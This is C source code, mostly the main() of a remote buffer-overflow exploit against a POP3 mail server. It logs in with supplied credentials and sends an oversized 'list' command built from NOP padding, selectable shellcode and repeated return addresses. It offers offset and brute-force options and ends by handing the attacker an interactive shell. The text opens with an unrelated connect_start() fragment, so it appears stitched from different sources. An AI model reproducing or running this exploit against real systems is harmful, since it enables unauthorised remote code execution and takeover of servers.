/*----------------------------------------------------------------------------- Section: Function Definitions ----------------------------------------------------------------------------*/ static unsigned int connect_start(void) { (void)ini_get_server_ip(serverip); (void)ini_get_server_port(&port); (void)ini_get_log_flag(&logflag); (void)log_init(); log_on(logflag); return socket_init(serverip, port); }
int main(int argc, char **argv) { int i, next_arg = 0; char *progname = argv[0]; char *remote_user = NULL, *remote_passwd = NULL, *message_number = strdup("1"); if (argc < 4) usage(progname); memset ((char *)&bruteforce, '\0', sizeof((char *)&bruteforce)); victim = (char *)strdup(argv[1]); argv++; argc--; remote_user = (char *)strdup(argv[1]); argv++; argc--; remote_passwd = (char *)strdup(argv[1]); argv++; argc--; while ( (next_arg = getopt(argc, argv, "p:t:s:o:r:i:b")) != EOF) switch (next_arg) { case 'p': if ( (atoi(optarg) < 0) || (atoi(optarg) > 65535) ) { fprintf (stderr, "Outrageous port-number! Stick with a number below 65535 (and above zero)\n"); usage (progname); } port = atoi(optarg); printf (" -> Port set to %d.\n", port); break; case 't': if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_TYPE) ) { fprintf (stderr, "Invalid type, should range from 0 to %d.\n", MAX_TYPE); usage (progname); } type = atoi(optarg); printf (" -> Type set to %d, %s %s.\n", type, platforms[type].platform, platforms[type].tested_on); break; case 's': if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_SHELLCODE) ) { fprintf (stderr, "Invalid shellcode number, should range from 0 to %d.\n", MAX_SHELLCODE); usage (progname); } shellcode_num = atoi(optarg); printf (" -> Shellcode set for %s, %s.\n", shellcodes[shellcode_num].platform, shellcodes[shellcode_num].function); break; case 'o': if (bruteforce.on == 1) { fprintf (stderr, "You cannot specify -offset and -bruteforce at the same time.\nMake up your mind!\n"); exit (-1); } offset = atoi(optarg); printf (" -> Offset set to %d.\n", offset); break; case 'b': bruteforce.on = 1; printf (" -> Bruteforce mode selected (not fully implemented in this version)\n"); printf (" -> Enter offsets seperated with a space, and a 'step' number (e.g. \"bfffffff bffff000 4\"):\n "); if ( (fscanf (stdin, "%x %x %d", &bruteforce.start, &bruteforce.end, &bruteforce.step)) != 3) { fprintf (stderr, "Unknown offsets.\n"); exit (-1); } break; case 'i': impact_place = atoi(optarg); printf (" -> Place of impact set to %d.\n", impact_place); break; case 'r': appenders = atoi(optarg); printf (" -> Number of return addresses set to %d.\n", appenders); break; case 'm': message_number = strdup(optarg); printf ("-> Message number set to \"%.10s\".\n", message_number); break; default: fprintf (stderr, "Fictional option: '%c', please take your medication.\n", next_arg); usage (progname); break; } do_lookup(); printf ("\nAttacking %s, a %s %s host\n", victim, platforms[type].platform, platforms[type].tested_on); if (shellcode_num != -1) { platforms[type].shellcode = &(shellcodes[shellcode_num]); printf (" - Using %s shellcode\n", shellcodes[shellcode_num].platform); } else printf (" - Using the default shellcode, %s\n", platforms[type].shellcode->platform); if (bruteforce.on == 0) { platforms[type].address -= offset; printf (" - Using return address %#x\n", platforms[type].address); printf ("\nAssembling shellspawning code\n"); } else printf (" - Going to bruteforce from %#x to %#x in steps of %d\n", bruteforce.start, bruteforce.end, bruteforce.step); printf ("-> Connecting to %s, port %d\n", inet_ntoa(in), port); do_connect(); receive (); log_on (remote_user, remote_passwd, sock); memset (buffer, '\0', sizeof(buffer)); sprintf (buffer, "list %.10s ", message_number); //the bug lies in pop_list.c /* I do the '%s' to allow the possibility to enter '0001', in order a non-working length of <nops>+<shellcode>+<ret>... (theoretically ;) */ #ifdef DEBUG printf ("Step 1, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer)); #endif memset (buffer+strlen(buffer), NOP, sizeof(buffer)-strlen(buffer)-1); #ifdef DEBUG printf ("Step 2, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer)); #endif strncpy (buffer + impact_place - strlen(platforms[type].shellcode->code), platforms[type].shellcode->code, sizeof(buffer) - impact_place - 5 - 1); //impact_place + strlen(platforms[type].shellcode->code) - (APPEND_ADDRESSES * sizeof(platforms[type].address) + 2) - 1); #ifdef DEBUG printf ("Step 3, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer)); #endif i = 0; while (i < appenders) { /* o = buffer + strlen(buffer); *(o) = (platforms[type].address & 0x000000ff); *(o+1) = (platforms[type].address & 0x0000ff00) >> 8; *(o+2) = (platforms[type].address & 0x00ff0000) >> 16; *(o+3) = (platforms[type].address & 0xff000000) >> 24; *(o+4) = '\0'; */ memcpy ((char *)&buffer + strlen(buffer), &platforms[type].address, 4); #ifdef HARDCORE printf ("-> sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer)); #endif i++; } strcpy (buffer + strlen(buffer), "\x0d\x0a"); // \x00 gets appended automatically #ifdef HARDCORE printf ("Code is:\n\033[1;31m"); for (i = 0; i < strlen(buffer); i++) printf ("%02x ", buffer[i]); printf ("\033[0;37m\n"); #endif transmit (buffer); receive (); printf ("Got shell!\n"); terminal (sock); close (sock); //not reached return (0); }